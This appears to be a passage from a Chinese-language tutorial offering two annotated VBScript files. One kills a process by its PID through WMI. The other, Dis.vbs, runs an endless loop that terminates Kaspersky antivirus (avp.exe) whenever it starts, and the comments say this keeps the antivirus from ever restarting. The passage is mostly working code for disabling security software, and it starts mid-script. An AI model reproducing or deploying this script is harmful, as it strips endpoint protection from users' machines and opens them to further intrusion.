for each ps in getobject _ ("winmgmts://./root/cimv2:win32_process").instances_ '涉及到WMI腳本入侵技術(shù),我不能解釋清楚! if ps.handle=wscript.arguments(0) then '判斷進(jìn)程的PID號(hào)是否與獲得的PID號(hào)參數(shù)相等 wscript.echo ps.terminate '如果相等就結(jié)束指定PID號(hào)對(duì)應(yīng)的進(jìn)程 end if next
Dis.vbs
復(fù)制代碼 代碼如下:
dim y,x '不要這行也行…… do '來個(gè)死循環(huán)……一直在判斷!do ... loop內(nèi)為循環(huán)體! set y=getobject("winmgmts://./root/cimv2") '和上面解釋一樣,這也是涉及到微軟的WMI技術(shù)! set x=y.execquery("select * from win32_process where name='avp.exe'") '查詢語句,where后判斷avp.exe(卡巴)是否存在進(jìn)程中! '這樣當(dāng)卡巴被上面的Kill.vbs結(jié)束時(shí)就再也啟動(dòng)不起來了。除非,把Dis.vbs結(jié)束了先…… for each i in x i.terminate() '卡巴要啟動(dòng)馬上就終止…… next wscript.sleep loop